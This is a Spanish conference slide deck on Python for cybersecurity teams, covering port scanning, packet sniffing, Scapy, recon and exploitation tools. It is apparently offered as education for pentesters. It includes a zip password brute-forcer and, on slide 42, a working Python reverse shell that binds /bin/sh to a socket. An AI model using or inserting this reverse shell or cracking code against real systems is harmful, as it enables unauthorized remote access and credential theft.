Python para equipos de ciberseguridad(pycones)

Transcript

1. www.sti-innsbruck.at
   

   View Slide

2. About me
   2
   http://jmortega.github.io/
   

   View Slide

3. Books
   3
   

   View Slide

4. Formación
   4
   https://www.adrformacion.com/cursos/pythonseg/pythonseg.html
   

   View Slide

5. Agenda
   • Introducción a Python para proyectos de
   ciberseguridad
   • Herramientas de pentesting
   • Herramientas Python desde el punto de vista
   defensivo
   • Herramientas Python desde el punto de vista
   ofensivo
   5
   

   View Slide

6. Python para proyectos de ciberseguridad
   6
   1. Diseñado para la creación rápida de prototipos
   2. Estructura simple y limpia, mejora la legibilidad y facilidad de
   uso.
   3. Amplia biblioteca, también facilidad de interconexión
   4. Ampliamente adoptado, la mayoría de las distribuciones de
   Linux lo instalan por defecto.
   

   View Slide

7. Python para proyectos de ciberseguridad
   7
   

   View Slide

8. Herramientas de pentesting
   8
   import re
   input_ip = input('Enter the ip:')
   flag = 0
   pattern = "^\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}$"
   match = re.match(pattern, input_ip)
   if (match):
   field = input_ip.split(".")
   for i in range(0, len(field)):
   if (int(field[i]) < 256):
   flag += 1
   else:
   flag = 0
   if (flag == 4):
   print("valid ip")
   else:
   print('No match for ip or not a valid ip')
   https://docs.python.org/3/library/re.html
   

   View Slide

9. Herramientas de pentesting
   9
   

   View Slide

10. Herramientas de pentesting
    10
    import nmap
    nma = nmap.PortScannerAsync()
    def callback_function(host, scan_result):
    print('RESULTADO ==>')
    print(host, scan_result)
    nma.scan(hosts='127.0.0.1', arguments='-sC -Pn', callback=callback_function)
    while nma.still_scanning():
    print("Esperando a que termine el escaneo ...")
    nma.wait(2)
    https://pypi.org/project/python-nmap/
    

    View Slide

11. Basic Networking
    11
    

    View Slide

12. Port Scanning
    12
    

    View Slide

13. Port Scanning
    13
    import socket
    from concurrent import futures
    def check_port(targetIp, portNumber, timeout):
    TCPsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    TCPsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    TCPsock.settimeout(timeout)
    try:
    TCPsock.connect((targetIp, portNumber))
    return (portNumber)
    except:
    return
    def port_scanner(targetIp, timeout):
    threadPoolSize = 500
    portsToCheck = 10000
    executor = futures.ThreadPoolExecutor(max_workers=threadPoolSize)
    checks = [
    executor.submit(check_port, targetIp, port, timeout)
    for port in range(0, portsToCheck, 1)
    ]
    for response in futures.as_completed(checks):
    if (response.result()):
    print('Listening on port: {}'.format(response.result()))
    

    View Slide

14. Port Scanning
    14
    

    View Slide

15. Banner Grabing
    15
    

    View Slide

16. Scraping
    16
    ● Requests
    ○ https://docs.python-requests.org/en/master
    ○ Peticiones HTTP
    ● BeautifulSoup
    ○ https://www.crummy.com/software/BeautifulSou
    p/bs4/doc
    ○ Parser XML,HTML
    ● Scrapy
    ○ https://scrapy.org
    ○ Framework de scraping
    

    View Slide

17. Scrapy
    17
    

    View Slide

18. Extracción de subdominios
    18
    ● https://github.com/1N3/BlackWidow
    

    View Slide

19. Reconspider
    19
    ● https://github.com/bhavsec/reconspider
    

    View Slide

20. Reconspider
    20
    

    View Slide

21. SpiderFoot
    21
    

    View Slide

22. RED TEAM vs BLUE TEAM
    22
    

    View Slide

23. SQLMap
    23
    ● https://sqlmap.org
    

    View Slide

24. SQLMap
    24
    

    View Slide

25. PwnXSS
    25
    

    View Slide

26. Fuzzing
    26
    ● Wfuzz
    ○ https://github.com/xmendez/wfuzz/
    ○ Web fuzzer framework
    ● Pyfuzz
    ○ https://github.com/AyoobAli/pyfuzz
    ○ Fuzzing para descubrir archivos /
    directorios ocultos
    

    View Slide

27. Fuxi Scanner
    27
    ● https://github.com/jeffzh3ng/fuxi
    

    View Slide

28. Fuxi Scanner
    28
    

    View Slide

29. Sniffing de paquetes
    29
    import socket
    import struct
    def ethernet_frame(data):
    dest_mac, src_mac, proto = struct.unpack('! 6s 6s H', data[:14])
    return format_mac_addr(dest_mac), format_mac_addr(src_mac), socket.htons(proto), data[14:]
    def format_mac_addr(bytes_addr):
    bytes_str = map('{:02x}'.format, bytes_addr)
    return ':'.join(bytes_str).upper()
    def main():
    conn = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(3))
    while True:
    raw_data, addr = conn.recvfrom(65535)
    dest_mac, src_mac, eth_proto, data = ethernet_frame(raw_data)
    if eth_proto == 8:
    print('\nEthernet Frame:')
    print('Destination: {}, Source: {}, Protocol: {}'.format(dest_mac, src_mac, eth_proto))
    print(data)
    if __name__ == "__main__":
    main()
    

    View Slide

30. Manipulación de paquetes
    30
    ● Scapy
    ○ https://scapy.net
    ○ Manipulación y decodificación de paquetes.
    ○ Enviar, rastrear, diseccionar y falsificar paquetes
    de red.
    

    View Slide

31. Manipulación de paquetes
    31
    from scapy.all import *
    packetCount = 0
    def customAction(packet):
    global packetCount
    packetCount += 1
    return "{}) {} → {}".format(packetCount,
    packet[0][1].src, packet[0][1].dst)
    ## Setup sniff, filtering for IP traffic
    sniff(filter="ip",prn=customAction)
    

    View Slide

32. Manipulación de paquetes
    32
    from scapy.all import ICMP
    from scapy.all import IP
    from scapy.all import sr1
    from scapy.all import ls
    if __name__ == "__main__":
    dest_ip = "www.google.com"
    ip_layer = IP(dst = dest_ip)
    print(ls(ip_layer)) # displaying complete layer info
    # accessing the fields
    print("Destination = ", ip_layer.dst)
    print("Summary = ",ip_layer.summary())
    

    View Slide

33. Sniffing de paquetes
    33
    from scapy.all import *
    def main():
    sniff(prn=http_header, filter="tcp port 80")
    def http_header(packet):
    http_packet=str(packet)
    if http_packet.find('GET'):
    return print_packet(packet)
    def print_packet(packet1):
    ret = "-------------------------------[ Received Packet ] -------------------------------\n"
    ret += "\n".join(packet1.sprintf("{Raw:%Raw.load%}\n").split(r"\r\n"))
    ret += "---------------------------------------------------------------------------------\n"
    return ret
    if __name__ == '__main__':
    main()
    

    View Slide

34. Explotación
    34
    ● CrackMapExec
    ○ https://github.com/byt3bl33d3r/CrackMapExec
    ○ Mapeo de la red, obtiene credenciales y ejecuta
    comandos.
    ● DeathStar
    ○ https://github.com/byt3bl33d3r/DeathStar
    ■ Permite automatizar la escalada de privilegios
    en un entorno Active Directory.
    

    View Slide

35. Password cracking
    35
    import zipfile
    import time
    encrypted_filename= "secret_file.zip"
    zFile = zipfile.ZipFile(encrypted_filename, "r")
    passFile = open("passwords.txt", "r")
    for line in passFile.readlines():
    test_password = line.strip("\n").encode('utf-8')
    try:
    print(test_password)
    zFile.extractall(pwd=test_password)
    print("Match found")
    break
    except Exception as err:
    pass
    

    View Slide

36. SSH brute force
    36
    import paramiko
    ssh = paramiko.SSHClient()
    ssh.load_system_host_keys()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh.connect(‘127.0.0.1', username=‘user',
    password=‘password')
    stdin,stdout,stderr = ssh.exec_command("uname -a")
    

    View Slide

37. SSH brute force
    37
    

    View Slide

38. Ejecución de procesos
    38
    https://docs.python.org/3/library/subprocess.html
    import subprocess
    subprocess.run('ls -la', shell=True)
    subprocess.run(['ls', '-la'])
    

    View Slide

39. Ejecución de procesos
    39
    https://docs.python.org/3/library/subprocess.html
    import subprocess
    process = subprocess.run(['which', 'python3'], capture_output=True)
    if process.returncode != 0:
    raise OSError('Sorry python3 is not installed')
    python_bin = process.stdout.strip()
    print(f'Python found in: {python_bin}')
    CompletedProcess(args=['which', 'python3'], returncode=0,
    stdout=b'/usr/bin/python3\n', stderr=b'')
    

    View Slide

40. Ejecución de procesos
    40
    https://docs.python.org/3/library/subprocess.html
    from pathlib import Path
    import subprocess
    source = Path("/home/linux")
    cmd = ["ls", "-l", source]
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)
    stdout, stderr = proc.communicate()
    print(stdout.decode("utf-8").split('\n')[:-1])
    
    

    View Slide

41. Shell inversa
    41
    

    View Slide

42. Shell inversa
    42
    #!/usr/bin/python
    import socket
    import subprocess
    import os
    sock = socket.socket(socket.AF_INET,
    socket.SOCK_STREAM)
    sock.connect(("127.0.0.1", 45679))
    os.dup2(sock.fileno(),0)
    os.dup2(sock.fileno(),1)
    os.dup2(sock.fileno(),2)
    shell_remote = subprocess.call(["/bin/sh", "-i"])
    #proc = subprocess.call(["/bin/ls", "-i"])
    

    View Slide

43. Books
    43
    

    View Slide

44. Books
    44
    https://github.com/PacktPublis
    hing/Python-Ethical-Hacking
    https://github.com/PacktPub
    lishing/Python-for-Offensive
    -PenTest
    

    View Slide

45. GitHub repository
    45
    https://github.com/jmortega/python_ciberseguridad_2021
    

    View Slide

46. 46
    

    View Slide